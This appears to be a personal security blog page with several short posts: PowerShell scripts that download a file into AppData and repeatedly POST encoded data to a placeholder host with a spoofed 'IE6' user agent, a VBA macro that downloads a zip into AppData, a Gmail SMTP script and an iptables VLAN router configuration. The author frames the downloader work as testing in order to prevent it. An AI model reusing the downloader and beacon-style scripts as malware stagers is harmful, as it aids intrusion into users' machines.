Tuesday, October 18, 2016

Powershell - Scripts to Download and Save a File AND POST Data to a Web Page

Recently I created a couple of simple Powershell scripts to download and save a file and then send a POST Request to a Site.  Below are the scripts that I created.

$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")       
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$response = $wc.DownloadString("http://blah.com/master.txt")
Set-Content -Value $response -Path $env:APPDATA\Microsoft\output.txt

---

$url = "http://blah.com/"
$encodedData = "b3V0Ym91bmQ%3d"

$params = New-Object System.Collections.Specialized.NameValueCollection
$params.Add('poster','blah55')
$params.Add('syntax','text')
$params.Add('content',$encodedData)

$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")       
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

for ($i=1; $i -le 50; $i++)
{
                $response = $wc.UploadValues($url, "POST", $params)
                $decoded = [System.Text.Encoding]::UTF8.GetString($response)
                Set-Content -Value $decoded -Path $env:APPDATA\Microsoft\post.txt
                start-sleep -seconds 600
}

$j=1
at No comments:

VBA - Script to Download a file from a URL

Below is a Visual Basic for Applications script I quickly build to download a file through a Macro to the computer.  This was to test the capability of being able to do it and finding a way to prevent it from occurring.

Sub dFile()
'
' vTest Macro
'
'
Dim myURL As String
dURL = "http://blah/text.zip"

Dim WinHttpReq As Object
Dim fileName As String

fileName = Environ("AppData") & "\microsoft\text.zip"
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", dURL
WinHttpReq.send

If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile fileName, 2
    oStream.Close
End If

End Sub
at No comments:

Python - Script to Send an Email through Gmail

Below is a python script that I was using to send an email through a gmail account:

#!/usr/bin/python

import smtplib

fromAddress='email@gmail.com'
toAddress='ltrappett@gmail.com'

msg='To another email address.'

username='email@gmail.com'
password='specific use password'

server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg)
server.quit()

at No comments:

iptables - Setup for a home router with 3 vlans

I began to create a home router with 2 NICs.  The first NIC is for the WAN and then the second NIC is for the LAN.  The LAN NIC is then split up with 3 vlans.  The vlans are serving the purposes of the first being for a Wireless LAN, second being the Wired LAN and the third being an Untrusted Network for testing and whatever else.  The NIC does plug into a switch that is then VLANed respectively also.  My purpose of posting it is to show how it could be done and understand it is probably not without bugs.

The main reason I am creating the 3 vlans is to separate out and monitor the IoT devices that are starting to accumulate in my house and separate my testing lab from everything else due to the malware that I sometimes will detonate in it.

Below is the configuration of the /etc/network/interfaces file to establish the vlans.  After that configuration is what I started with to built out iptables for each environment.  I am also running a caching bind9 server and plan to setup squid for a transparent web proxy.  With the logs that are generated I intend on feeding them into a SIEM.  I am in debate of using AlienVault OSSIM, Splunk Light, ELK or one of many others...

## /etc/network/interfaces ##
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.20.5.254
netmask 255.255.255.0
network 172.20.5.0
broadcast 172.20.5.255
gateway 172.20.5.1
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 172.20.5.1
dns-search thepcn3rd.local

# Native Network
auto eth1
iface eth1 inet static
address 10.0.0.1
netmask 255.255.255.0
network 10.0.0.0
broadcast 10.0.0.255
dns-nameservers 10.0.0.1
dns-search my.local

# Wireless Network
auto eth1.10
iface eth1.10 inet static
address 10.10.0.1
netmask 255.255.255.0
network 10.10.0.0
broadcast 10.10.0.255
dns-nameservers 10.10.0.1
dns-search wireless.local
vlan-raw-device eth1

# Wired Network
auto eth1.20
iface eth1.20 inet static
address 10.20.0.1
netmask 255.255.255.0
network 10.20.0.0
broadcast 10.20.0.255
dns-nameservers 10.20.0.1
dns-search wired.local
vlan-raw-device eth1

# Untrusted Network
auto eth1.30
iface eth1.30 inet static
address 10.30.0.1
netmask 255.255.255.0
network 10.30.0.0
broadcast 10.30.0.255
dns-nameservers 10.30.0.1
dns-search blue.local
vlan-raw-device eth1

## iptables ##
iptables -F
iptables -t nat -F
iptables -X
iptables -Z

iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP

iptables -N WAN_ACCEPT
iptables -N LAN_ACCEPT
iptables -N LOG_FORWARD_ACCEPT
iptables -N WAN_OUTPUT_DROP
iptables -N LAN_OUTPUT_DROP
iptables -N WAN_INPUT_DROP
iptables -N LAN_INPUT_DROP
iptables -N FORWARD_DROP

iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
#iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

################################## Allow incoming to eth0 #####
# Comcast LAN to eth0 Router WAN
# SSH
iptables -A INPUT -i eth0 -p tcp -s 172.20.5.0/24 -d 172.20.5.254 --dport 22 -m state --state NEW,ESTABLISHED -j WAN_ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -s 172.20.5.254 -d 172.20.5.0/24 --sport 22 -m state --state ESTABLISHED -j WAN_ACCEPT

################################## Allow incoming to eth1.20 #####
# eth1.20 Wired LAN to eth0 Router LAN
# SSH TCP/22 from LAN to 10.20.0.1
iptables -A INPUT -i eth1.20 -p tcp -s 10.20.0.0/24 -d 10.20.0.1 --dport 22 -m state --state NEW,ESTABLISHED -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.20 -p tcp -s 10.20.0.1 -d 10.20.0.0/24 --sport 22 -m state --state ESTABLISHED -j LAN_ACCEPT
# DNS UDP/53 from LAN to 10.10.0.1, 10.20.0.1 and 10.30.0.1
iptables -A INPUT -i eth1.10 -p udp -s 10.10.0.0/24 -d 10.10.0.1 --dport 53 -j ACCEPT
iptables -A OUTPUT -o eth1.10 -p udp -s 10.10.0.1 -d 10.10.0.0/24 --sport 53 -j ACCEPT
iptables -A INPUT -i eth1.20 -p udp -s 10.20.0.0/24 -d 10.20.0.1 --dport 53 -j ACCEPT
iptables -A OUTPUT -o eth1.20 -p udp -s 10.20.0.1 -d 10.20.0.0/24 --sport 53 -j ACCEPT
iptables -A INPUT -i eth1.30 -p udp -s 10.30.0.0/24 -d 10.30.0.1 --dport 53 -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.30 -p udp -s 10.30.0.1 -d 10.30.0.0/24 --sport 53 -j LAN_ACCEPT
# DHCP UDP/67 from LAN to 10.10.0.1, 10.20.0.1, 10.30.0.1
iptables -A INPUT -i eth1.10 -p udp -s 10.10.0.0/24 -d 10.10.0.1 --dport 67 -j ACCEPT
iptables -A OUTPUT -o eth1.10 -p udp -s 10.10.0.1 -d 10.10.0.0/24 --sport 67 -j ACCEPT
iptables -A INPUT -i eth1.20 -p udp -s 10.20.0.0/24 -d 10.20.0.1 --dport 67 -j ACCEPT
iptables -A OUTPUT -o eth1.20 -p udp -s 10.20.0.1 -d 10.20.0.0/24 --sport 67 -j ACCEPT
iptables -A INPUT -i eth1.30 -p udp -s 10.30.0.0/24 -d 10.30.0.1 --dport 67 -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.30 -p udp -s 10.30.0.1 -d 10.30.0.0/24 --sport 67 -j LAN_ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Forward eth1.10 to eth0 and back
iptables -A FORWARD -i eth1.10 -o eth0 -p udp -s 10.10.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p udp -d 10.10.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.10 -o eth0 -p tcp -s 10.10.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p tcp -d 10.10.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.10 -o eth0 -p tcp -s 10.10.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p tcp -d 10.10.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT

# Forward eth1.20 to eth0 and back
iptables -A FORWARD -i eth1.20 -o eth0 -p udp -s 10.20.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p udp -d 10.20.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.20 -o eth0 -p tcp -s 10.20.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p tcp -d 10.20.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.20 -o eth0 -p tcp -s 10.20.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p tcp -d 10.20.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT

# Forward eth1.30 to eth0 and back
iptables -A FORWARD -i eth1.30 -o eth0 -p udp -s 10.30.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p udp -d 10.30.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.30 -o eth0 -p tcp -s 10.30.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p tcp -d 10.30.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.30 -o eth0 -p tcp -s 10.30.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p tcp -d 10.30.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -j FORWARD_DROP

# Output from eth0 to WAN
# DNS to 75.75.75.75 or root servers
iptables -A OUTPUT -o eth0 -p udp -s 172.20.5.254 -d 75.75.75.75 --dport 53 -j LAN_ACCEPT
iptables -A INPUT -i eth0 -p udp -d 172.20.5.254 -s 75.75.75.75 --sport 53 -j LAN_ACCEPT

#iptables -N LOGGING
#iptables -A INPUT -j LOGGING
#iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTABLES: " --log-level 7
#iptables -A LOGGING -j DROP

iptables -A WAN_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "WAN-ACCEPT " --log-level 6
iptables -A WAN_ACCEPT -j ACCEPT 

iptables -A LAN_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "LAN-ACCEPT " --log-level 6
iptables -A LAN_ACCEPT -j ACCEPT 

iptables -A LOG_FORWARD_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "FORWARD-ACCEPT " --log-level 6
iptables -A LOG_FORWARD_ACCEPT -j ACCEPT 

iptables -A INPUT -i eth0 -j WAN_INPUT_DROP
iptables -A INPUT -i eth1.10 -j LAN_INPUT_DROP
iptables -A INPUT -i eth1.20 -j LAN_INPUT_DROP
iptables -A INPUT -i eth1.30 -j LAN_INPUT_DROP

iptables -A OUTPUT -o eth0 -j WAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.10 -j LAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.20 -j LAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.30 -j LAN_OUTPUT_DROP

iptables -A WAN_INPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "WAN_INPUT_DROP " --log-level 6
iptables -A WAN_INPUT_DROP -j DROP 

iptables -A WAN_OUTPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "WAN_OUTPUT_DROP " --log-level 6
iptables -A WAN_OUTPUT_DROP -j DROP 

iptables -A LAN_INPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "LAN_INPUT_DROP " --log-level 6
iptables -A LAN_INPUT_DROP -j DROP

iptables -A LAN_OUTPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "LAN_OUTPUT_DROP " --log-level 6
iptables -A LAN_OUTPUT_DROP -j DROP

iptables -A FORWARD_DROP -m limit --limit 2/min -j LOG --log-prefix "FORWARD_DROP " --log-level 6
iptables -A FORWARD_DROP -j DROP
at No comments:
Subscribe to: Posts (Atom)

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...